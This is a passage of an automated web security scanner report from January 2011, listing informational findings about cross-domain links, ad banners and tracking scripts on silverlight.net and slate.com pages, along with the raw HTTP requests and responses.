X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 19:58:25 GMT
Content-Length: 381

<html><head></head><body><body bgcolor="#FFFFFF"><a href="http://ads.asp.net/a.aspx?Task=Click&ZoneID=36&CampaignID=1882&AdvertiserID=57&BannerID=1779&SiteID=2&RandomNumber=1951762302&Keywords=" target="_Blank"><img src="http://ads.asp.net/ads/Silverlight-AgData-SLfree.jpg" width="300" height="250" alt="Developer Express" align="Center" border="0"></a>
...[SNIP]...

22.473. http://www.silverlight.net/adchain.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.silverlight.net
Path:	/adchain.html

Issue detail

The page was loaded from a URL containing a query string:

http://www.silverlight.net/adchain.html?ZoneID=401&Task=Get&ifr=true&SiteID=2

The response contains the following links to other domains:

http://ads.neudesicmediagroup.com/a.aspx?Task=Click&ZoneID=58&CampaignID=515&AdvertiserID=31&BannerID=440&SiteID=6&RandomNumber=547451066&Keywords=
http://ads.neudesicmediagroup.com/ads/winforms_1110_728x90.gif

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
ETag: ""
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 19:58:27 GMT
Content-Length: 385

<html><head></head><body><body bgcolor="#FFFFFF"><a href="http://ads.neudesicmediagroup.com/a.aspx?Task=Click&ZoneID=58&CampaignID=515&AdvertiserID=31&BannerID=440&SiteID=6&RandomNumber=547451066&Keywords=" target="_Blank"><img src="http://ads.neudesicmediagroup.com/ads/winforms_1110_728x90.gif" width="728" height="90" alt="" align="Center" border="0"></a>
...[SNIP]...

22.474. http://www.silverlight.net/adchain.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.silverlight.net
Path:	/adchain.html

Issue detail

The page was loaded from a URL containing a query string:

http://www.silverlight.net/adchain.html?ZoneID=401&Task=Get&ifr=true&SiteID=2

The response contains the following links to other domains:

http://ads.neudesicmediagroup.com/a.aspx?Task=Click&ZoneID=58&CampaignID=454&AdvertiserID=12&BannerID=432&SiteID=6&RandomNumber=185348024&Keywords=
http://ads.neudesicmediagroup.com/ads/2010_q4_728x90.gif

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
ETag: ""
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 17:15:48 GMT
Content-Length: 379

<html><head></head><body><body bgcolor="#FFFFFF"><a href="http://ads.neudesicmediagroup.com/a.aspx?Task=Click&ZoneID=58&CampaignID=454&AdvertiserID=12&BannerID=432&SiteID=6&RandomNumber=185348024&Keywords=" target="_Blank"><img src="http://ads.neudesicmediagroup.com/ads/2010_q4_728x90.gif" width="728" height="90" alt="" align="Center" border="0"></a>
...[SNIP]...

22.475. http://www.silverlight.net/adchain.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.silverlight.net
Path:	/adchain.html

Issue detail

The page was loaded from a URL containing a query string:

http://www.silverlight.net/adchain.html?ZoneID=401&Task=Get&ifr=true&SiteID=2

The response contains the following links to other domains:

http://ads.neudesicmediagroup.com/a.aspx?Task=Click&ZoneID=58&CampaignID=509&AdvertiserID=70&BannerID=390&SiteID=6&RandomNumber=559178174&Keywords=
http://ads.neudesicmediagroup.com/ads/DK-Google-728x90-Banner-01.jpg

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
ETag: ""
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 01:25:49 GMT
Content-Length: 391

<html><head></head><body><body bgcolor="#FFFFFF"><a href="http://ads.neudesicmediagroup.com/a.aspx?Task=Click&ZoneID=58&CampaignID=509&AdvertiserID=70&BannerID=390&SiteID=6&RandomNumber=559178174&Keywords=" target="_Blank"><img src="http://ads.neudesicmediagroup.com/ads/DK-Google-728x90-Banner-01.jpg" width="728" height="90" alt="" align="Center" border="0"></a>
...[SNIP]...

22.476. http://www.silverlight.net/adchain.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.silverlight.net
Path:	/adchain.html

Issue detail

The page was loaded from a URL containing a query string:

http://www.silverlight.net/adchain.html?ZoneID=389&Task=Get&ifr=true&SiteID=2

The response contains the following links to other domains:

http://ads.neudesicmediagroup.com/a.aspx?Task=Click&ZoneID=58&CampaignID=515&AdvertiserID=31&BannerID=368&SiteID=6&RandomNumber=1141796034&Keywords=
http://ads.neudesicmediagroup.com/ads/charts_1110_728x90.gif

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
ETag: ""
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:14:48 GMT
Content-Length: 384

<html><head></head><body><body bgcolor="#FFFFFF"><a href="http://ads.neudesicmediagroup.com/a.aspx?Task=Click&ZoneID=58&CampaignID=515&AdvertiserID=31&BannerID=368&SiteID=6&RandomNumber=1141796034&Keywords=" target="_Blank"><img src="http://ads.neudesicmediagroup.com/ads/charts_1110_728x90.gif" width="728" height="90" alt="" align="Center" border="0"></a>
...[SNIP]...

22.477. http://www.silverlight.net/adchain.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.silverlight.net
Path:	/adchain.html

Issue detail

The page was loaded from a URL containing a query string:

http://www.silverlight.net/adchain.html?ZoneID=37&Task=Get&ifr=true&SiteID=2

The response contains the following links to other domains:

http://ads.asp.net/a.aspx?Task=Click&ZoneID=37&CampaignID=1887&AdvertiserID=2&BannerID=2555&SiteID=2&RandomNumber=1776744983&Keywords=
http://ads.asp.net/ads/SL-Dec-Jan-SL-WPF-DataChart.jpg

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
ETag: ""
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:14:48 GMT
Content-Length: 365

<html><head></head><body><body bgcolor="#FFFFFF"><a href="http://ads.asp.net/a.aspx?Task=Click&ZoneID=37&CampaignID=1887&AdvertiserID=2&BannerID=2555&SiteID=2&RandomNumber=1776744983&Keywords=" target="_Blank"><img src="http://ads.asp.net/ads/SL-Dec-Jan-SL-WPF-DataChart.jpg" width="300" height="250" alt="" align="Center" border="0"></a>
...[SNIP]...

22.478. http://www.silverlight.net/adchain.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.silverlight.net
Path:	/adchain.html

Issue detail

The page was loaded from a URL containing a query string:

http://www.silverlight.net/adchain.html?ZoneID=36&Task=Get&ifr=true&SiteID=2

The response contains the following links to other domains:

http://ads.asp.net/a.aspx?Task=Click&ZoneID=36&CampaignID=1882&AdvertiserID=57&BannerID=1779&SiteID=2&RandomNumber=950850400&Keywords=
http://ads.asp.net/ads/Silverlight-AgData-SLfree.jpg

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
ETag: ""
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 01:25:49 GMT
Content-Length: 380

<html><head></head><body><body bgcolor="#FFFFFF"><a href="http://ads.asp.net/a.aspx?Task=Click&ZoneID=36&CampaignID=1882&AdvertiserID=57&BannerID=1779&SiteID=2&RandomNumber=950850400&Keywords=" target="_Blank"><img src="http://ads.asp.net/ads/Silverlight-AgData-SLfree.jpg" width="300" height="250" alt="Developer Express" align="Center" border="0"></a>
...[SNIP]...

22.479. http://www.silverlight.net/adchain.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.silverlight.net
Path:	/adchain.html

Issue detail

The page was loaded from a URL containing a query string:

http://www.silverlight.net/adchain.html?ZoneID=389&Task=Get&ifr=true&SiteID=2

The response contains the following links to other domains:

http://ads.neudesicmediagroup.com/a.aspx?Task=Click&ZoneID=58&CampaignID=496&AdvertiserID=14&BannerID=430&SiteID=6&RandomNumber=629773184&Keywords=
http://ads.neudesicmediagroup.com/ads/LDN.videos.728.131.gen.gif

Request

GET /adchain.html?ZoneID=389&Task=Get&ifr=true&SiteID=2 HTTP/1.1
Host: www.silverlight.net
Proxy-Connection: keep-alive
Referer: http://www.silverlight.net/getstarted/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=dffchm455phi2oqm1taknp3x; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; s_cc=true; s_sq=msstoslvnet%3D%2526pid%253Dlogin.silverlight.net/login/signin.aspx%2526pidt%253D1%2526oid%253Dhttp%25253A//www.silverlight.net/getstarted/%2526ot%253DA
If-None-Match: ""

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
ETag: ""
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:18:37 GMT
Content-Length: 387

<html><head></head><body><body bgcolor="#FFFFFF"><a href="http://ads.neudesicmediagroup.com/a.aspx?Task=Click&ZoneID=58&CampaignID=496&AdvertiserID=14&BannerID=430&SiteID=6&RandomNumber=629773184&Keywords=" target="_Blank"><img src="http://ads.neudesicmediagroup.com/ads/LDN.videos.728.131.gen.gif" width="728" height="90" alt="" align="Center" border="0"></a>
...[SNIP]...

22.480. http://www.silverlight.net/adchain.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.silverlight.net
Path:	/adchain.html

Issue detail

The page was loaded from a URL containing a query string:

http://www.silverlight.net/adchain.html?ZoneID=389&Task=Get&ifr=true&SiteID=2

The response contains the following link to another domain:

http://d2.zedo.com/jsc/d2/fo.js

Request

GET /adchain.html?ZoneID=389&Task=Get&ifr=true&SiteID=2 HTTP/1.1
Host: www.silverlight.net
Proxy-Connection: keep-alive
Referer: http://www.silverlight.net/getstarted/devices/windows-phone/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=dffchm455phi2oqm1taknp3x; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; s_cc=true; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//www.silverlight.net/getstarted/devices/windows-phone/%2526ot%253DA
If-None-Match: ""

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
ETag: ""
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:16:26 GMT
Content-Length: 531

<html><head></head><body><body bgcolor="#FFFFFF">
<script language="JavaScript">
var zflag_ni
...[SNIP]...
</script>
<script language="JavaScript" src="http://d2.zedo.com/jsc/d2/fo.js"></script>
...[SNIP]...

22.481. http://www.silverlight.net/adchain.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.silverlight.net
Path:	/adchain.html

Issue detail

The page was loaded from a URL containing a query string:

http://www.silverlight.net/adchain.html?ZoneID=38&Task=Get&ifr=true&SiteID=2

The response contains the following links to other domains:

http://ads.asp.net/a.aspx?Task=Click&ZoneID=38&CampaignID=1848&AdvertiserID=12&BannerID=2631&SiteID=2&RandomNumber=679233036&Keywords=
http://ads.asp.net/ads/wijmo_charts_300x250.png

Request

GET /adchain.html?ZoneID=38&Task=Get&ifr=true&SiteID=2 HTTP/1.1
Host: www.silverlight.net
Proxy-Connection: keep-alive
Referer: http://www.silverlight.net/getstarted/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=dffchm455phi2oqm1taknp3x; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; s_cc=true; s_sq=msstoslvnet%3D%2526pid%253Dforums.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//www.silverlight.net/getstarted/%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
ETag: ""
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:16:13 GMT
Content-Length: 358

<html><head></head><body><body bgcolor="#FFFFFF"><a href="http://ads.asp.net/a.aspx?Task=Click&ZoneID=38&CampaignID=1848&AdvertiserID=12&BannerID=2631&SiteID=2&RandomNumber=679233036&Keywords=" target="_Blank"><img src="http://ads.asp.net/ads/wijmo_charts_300x250.png" width="300" height="250" alt="" align="Center" border="0"></a>
...[SNIP]...

22.482. http://www.silverlight.net/adchain.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.silverlight.net
Path:	/adchain.html

Issue detail

The page was loaded from a URL containing a query string:

http://www.silverlight.net/adchain.html?ZoneID=401&Task=Get&ifr=true&SiteID=2

The response contains the following links to other domains:

http://ads.neudesicmediagroup.com/a.aspx?Task=Click&ZoneID=58&CampaignID=482&AdvertiserID=59&BannerID=297&SiteID=6&RandomNumber=504513452&Keywords=
http://ads.neudesicmediagroup.com/ads/Spread%20728x90.gif

Request

GET /adchain.html?ZoneID=401&Task=Get&ifr=true&SiteID=2 HTTP/1.1
Host: www.silverlight.net
Proxy-Connection: keep-alive
Referer: http://www.silverlight.net/showcase/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=dffchm455phi2oqm1taknp3x; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; s_cc=true; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/learn/%2526pidt%253D1%2526oid%253Dhttp%25253A//www.silverlight.net/showcase/%2526ot%253DA
If-None-Match: ""

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
ETag: ""
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:16:33 GMT
Content-Length: 406

<html><head></head><body><body bgcolor="#FFFFFF"><a href="http://ads.neudesicmediagroup.com/a.aspx?Task=Click&ZoneID=58&CampaignID=482&AdvertiserID=59&BannerID=297&SiteID=6&RandomNumber=504513452&Keywords=" target="_Blank"><img src="http://ads.neudesicmediagroup.com/ads/Spread%20728x90.gif" width="728" height="90" alt="Advertisement - Grape City" align="Center" border="0"></a>
...[SNIP]...

22.483. http://www.silverlight.net/getstarted/devices/details.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.silverlight.net
Path:	/getstarted/devices/details.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://www.silverlight.net/getstarted/devices/details.aspx?__vanityfilename=windows-phone

The response contains the following links to other domains:

http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js
http://channel9.msdn.com/
http://channel9.msdn.com/learn/courses/WP7TrainingKit/
http://developer.windowsphone.com/
http://edge.technet.com/
http://go.microsoft.com/?linkid=9713249
http://go.microsoft.com/?linkid=9713251
http://go.microsoft.com/?linkid=9713254
http://go.microsoft.com/fwlink/?LinkID=185584
http://go.microsoft.com/fwlink/?LinkID=194469
http://msdn.microsoft.com/
http://msdn.microsoft.com/en-us/library/ff637515(VS.92).aspx
http://msstonojsslvnet.112.2o7.net/b/ss/msstonojsslvnet/1/H.20.2--NS/0
http://silverlight.codeplex.com/
http://social.msdn.microsoft.com/Forums/en-US/windowsphone7series/threads
http://visitmix.com/
http://www.asp.net/
http://www.iis.net/
http://www.msdn.com/
http://www.neudesicmediagroup.com/Advertising.aspx?site=Silverlight
http://www.omniture.com/
http://www.windowsclient.net/

Request

GET /getstarted/devices/details.aspx?__vanityfilename=windows-phone HTTP/1.1
Host: www.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/getstarted/%2526pidt%253D1%2526oid%253Dhttp%25253A//www.silverlight.net/showcase/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=dffchm455phi2oqm1taknp3x;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 17510
Content-Type: text/html; charset=utf-8
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:38:36 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>
Silverligh
...[SNIP]...
<link rel="stylesheet" media="print" type="text/css" href="http://i2.silverlight.net/resources/style/print.css?cdn_id=12152010" />
<script src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js" type="text/javascript"></script>
...[SNIP]...
</p>

<a href="http://msdn.microsoft.com/"><img class="logo_msdn" alt="MSDN" src="http://i1.silverlight.net/resources/images/content/misc/header_logo_msdn.png?cdn_id=12152010">
...[SNIP]...
</iframe><a href="http://www.neudesicmediagroup.com/Advertising.aspx?site=Silverlight"><img src="http://i1.silverlight.net/resources/images/content/misc/placeholder_advertisehere_top.png?cdn_id=12152010" alt="Advertise Here" />
...[SNIP]...
<p><a class="common_button" href="http://go.microsoft.com/fwlink/?LinkID=185584">DOWNLOAD NOW</a>
...[SNIP]...
<strong><a href="http://developer.windowsphone.com/">Windows Phone Developer</a>
...[SNIP]...
<li><a href="http://go.microsoft.com/fwlink/?LinkID=185584">Windows Phone Developer Tools</a> (be sure to <a href="http://go.microsoft.com/fwlink/?LinkID=194469">read the release notes</a>
...[SNIP]...
<li><a href="http://silverlight.codeplex.com/">Download the Windows Phone 7 Toolkit</a>
...[SNIP]...
<li><a href="http://go.microsoft.com/?linkid=9713251">Developer Reference Documentation</a>
...[SNIP]...
<li>Developer guides for <a href="http://go.microsoft.com/?linkid=9713249">platform overview</a> and <a href="http://msdn.microsoft.com/en-us/library/ff637515(VS.92).aspx">UI guidelines</a>
...[SNIP]...
<li><a href="http://go.microsoft.com/?linkid=9713254">Code samples</a>
...[SNIP]...
<li><a href="http://channel9.msdn.com/learn/courses/WP7TrainingKit/">Channel 9 for hands-on-labs and other tutorials</a>
...[SNIP]...
<li><a href="http://social.msdn.microsoft.com/Forums/en-US/windowsphone7series/threads">Dedicated developer support forum for Silverlight for Windows Phone</a>
...[SNIP]...
<p>What are you waiting for? Go <a href="http://go.microsoft.com/fwlink/?LinkID=185584">install the tools</a>
...[SNIP]...
</iframe>
<a class="link_advertise" href="http://www.neudesicmediagroup.com/Advertising.aspx?site=Silverlight">Advertise Here</a>
...[SNIP]...
</iframe><a href="http://www.neudesicmediagroup.com/Advertising.aspx?site=Silverlight"><img src="http://i1.silverlight.net/resources/images/content/misc/placeholder_advertisehere.jpg?cdn_id=12152010" alt="Advertise Here" />
...[SNIP]...
</a> | <a href="http://www.neudesicmediagroup.com/Advertising.aspx?site=Silverlight">Advertise with us</a>
...[SNIP]...
<div class="footer_img_links">
<a href="http://www.asp.net" title="ASP.net"><img src="http://i1.silverlight.net/resources/images/content/misc/aspnet.png?cdn_id=12152010" alt="ASP.net" />
...[SNIP]...
</a>
<a href="http://channel9.msdn.com" title="Channel 9"> <img src="http://i1.silverlight.net/resources/images/content/misc/channel9.png?cdn_id=12152010" alt="Channel 9" /></a>
<a href="http://edge.technet.com/" title="Edge Technet"> <img src="http://i1.silverlight.net/resources/images/content/misc/technet.png?cdn_id=12152010" alt="Edge Technet" /></a>
<a href="http://www.iis.net" title="IIS"><img src="http://i1.silverlight.net/resources/images/content/misc/iis.png?cdn_id=12152010" alt="IIS" /></a>
<a href="http://visitmix.com/" title="MIX"><img src="http://i2.silverlight.net/resources/images/content/misc/mix.png?cdn_id=12152010" alt="MIX" /></a>
<a href="http://www.msdn.com" title="MSDN"><img src="http://i3.silverlight.net/resources/images/content/misc/msdn.png?cdn_id=12152010" alt="MSDN" /></a>
<a href="http://www.windowsclient.net" title="Windows Client"> <img src="http://i3.silverlight.net/resources/images/content/misc/windows_client.png?cdn_id=12152010" alt="WindowsClient" />
...[SNIP]...
<noscript><a href="http://www.omniture.com" title="Web Analytics"><img src="http://msstonojsslvnet.112.2O7.net/b/ss/msstonojsslvnet/1/H.20.2--NS/0" height="1" width="1" border="0" alt="" /></a>
...[SNIP]...

22.484. http://www.slate.com/id/2282444/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.slate.com
Path:	/id/2282444/

Issue detail

The page was loaded from a URL containing a query string:

http://www.slate.com/id/2282444/?GT1=38001

The response contains the following links to other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js
http://deadsp.in/gXIoPd
http://digg.com/submit?phase=2&url=http://www.slate.com/id/2282444/&title=Slate+Magazine+-+Barbies+Gone+Wild
http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab
http://edge.quantserve.com/quant.js
http://js-kit.com/comments-count.js
http://js.adsonar.com/js/adsonar.js
http://js.revsci.net/gateway/gw.js?csid=J05531
http://media.washingtonpost.com/wp-srv/ad/audsci.js
http://media.washingtonpost.com/wp-srv/ad/slate_ad2.js
http://media.washingtonpost.com/wp-srv/ad/textlinks/js/utilsTextLinksXML.js
http://media.washingtonpost.com/wp-srv/ad/textlinks/style/textlinks.css
http://media.washingtonpost.com/wp-srv/ad/wpni_generic_ad.js
http://media.washingtonpost.com/wp-srv/wapolabs/utils/wapo.js
http://media3.washingtonpost.com/wp-srv/wapolabs/revplat/prod/1_4_1/js/rev_platform_ads.min.js
http://pixel.quantserve.com/pixel/p-5cYn7dCzvaeyA.gif
http://platform.twitter.com/anywhere.js?id=tDoKZOQ1QduBuHW8Q9MXTA&v=1
http://reddit.com/submit?url=http://www.slate.com/id/2282444/&title=Slate+Magazine+-+Barbies+Gone+Wild
http://search.twitter.com/search?q=%23Egypt
http://slate.me/gnohLd
http://slate.me/iaYMxt
http://twitter.com/Slate
http://twitter.com/home?status=Slate+Magazine+-+Barbies+Gone+Wild%20-%200
http://www.amazon.com/gp/product/0061711527?ie=UTF8&tag=slatmaga-20&linkCode=as2&camp=1789&creative=390957&creativeASIN=0061711527
http://www.amazon.com/gp/redirect.html?ie=UTF8&location=http%3A%2F%2Fwww.amazon.com%2Fgp%2Fentity%2FMyla-Goldberg%2FB001IOBQYG%3Fie%3DUTF8%26ref_%3Dsr_ntt_srch_lnk_1%26qid%3D1296150636%26sr%3D8-1&tag=slatmaga-20&linkCode=ur2&camp=1789&creative=390957
http://www.amazon.com/gp/redirect.html?ie=UTF8&location=http%3A%2F%2Fwww.amazon.com%2Fs%3Fie%3DUTF8%26x%3D0%26ref_%3Dnb_sb_noss%26y%3D0%26field-keywords%3Dbratz%26url%3Dsearch-alias%253Daps&tag=slatmaga-20&linkCode=ur2&camp=1789&creative=390957
http://www.doonesbury.com/
http://www.facebook.com/pages/Slatecom/21516776437
http://www.facebook.com/plugins/activity.php?site=www.slate.com&width=306&height=600&header=false&border_color=white&font=arial&colorscheme=light&recommendations=true
http://www.facebook.com/plugins/like.php?href=http://www.slate.com/id/2282444&layout=button_count&show_faces=false&width=450&action=like&font=arial&colorscheme=light&height=21
http://www.facebook.com/plugins/like.php?href=http://www.slate.com/id/2282444&layout=standard&show_faces=false&width=400&action=like&font=arial&colorscheme=light&height=40
http://www.facebook.com/plugins/likebox.php?id=21516776437&width=220&connections=0&stream=false&header=false&height=60
http://www.facebook.com/sharer.php?u=http://www.slate.com/id/2282444/&t=Cinderella+Ate+My+Daughter:+Peggy+Orenstein's+new+book.
http://www.facebook.com/slate
http://www.foreignpolicy.com/
http://www.foreignpolicy.com/articles/2011/01/20/close_encounters_of_the_buddhist_kind
http://www.foreignpolicy.com/articles/2011/01/25/day_of_rage
http://www.foreignpolicy.com/articles/2011/01/27/egypt_s_struggle_for_freedom
http://www.magreprints.com/quickquote.aspx
http://www.mylagoldberg.com/
http://www.stumbleupon.com/submit?url=http://www.slate.com/id/2282444/&title=Slate+Magazine+-+Barbies+Gone+Wild
http://www.theroot.com/?from=rss
http://www.theroot.com/buzz/egypt-crisis-intensifies
http://www.theroot.com/buzz/tichina-arnold-return-television
http://www.theroot.com/views/root-interview-corinne-bailey-rae-getting-happy
http://www.twitter.com/slate

Request

GET /id/2282444/?GT1=38001 HTTP/1.1
Host: www.slate.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 29 Jan 2011 23:55:32 GMT
Server: Microsoft-IIS/6.0
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 49743

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en-US" lang="en-US" xmlns:lookup="XslLookup" xmlns="xhtml"><he
...[SNIP]...
</script><script type="text/javascript" language="javascript" src="http://media.washingtonpost.com/wp-srv/ad/wpni_generic_ad.js" xmlns="" xmlns:tools="XslTools"></script><script type="text/javascript" language="javascript" src="http://media.washingtonpost.com/wp-srv/ad/slate_ad2.js" xmlns="" xmlns:tools="XslTools"></script><script type="text/javascript" language="javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" xmlns="" xmlns:tools="XslTools"></script>
...[SNIP]...
</script><link rel="stylesheet" type="text/css" href="http://media.washingtonpost.com/wp-srv/ad/textlinks/style/textlinks.css" xmlns="" xmlns:tools="XslTools"><link rel="stylesheet" type="text/css" href="http://img.slate.com/css/echo.css" xmlns="" xmlns:tools="XslTools">
...[SNIP]...
</script><script type="text/javascript" src="http://platform.twitter.com/anywhere.js?id=tDoKZOQ1QduBuHW8Q9MXTA&v=1" xmlns=""></script>
...[SNIP]...
<em><a href="http://www.amazon.com/gp/product/0061711527?ie=UTF8&tag=slatmaga-20&linkCode=as2&camp=1789&creative=390957&creativeASIN=0061711527" target="_blank" xmlns:tools="XslTools"><span style="color:#0000ff;">
...[SNIP]...
<div style="padding:3px"><iframe src="http://www.facebook.com/plugins/like.php?href=http://www.slate.com/id/2282444&layout=button_count&show_faces=false&width=450&action=like&font=arial&colorscheme=light&height=21" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:450px; height:21px;" allowTransparency="true" xmlns:fb="http://www.facebook.com/2008/fbml"></iframe>
...[SNIP]...
</a><a class="tools tools-reprint" title="Reprints" href="http://www.magreprints.com/quickquote.aspx" target="_blank" rel="nofollow">REPRINTS</a>
...[SNIP]...
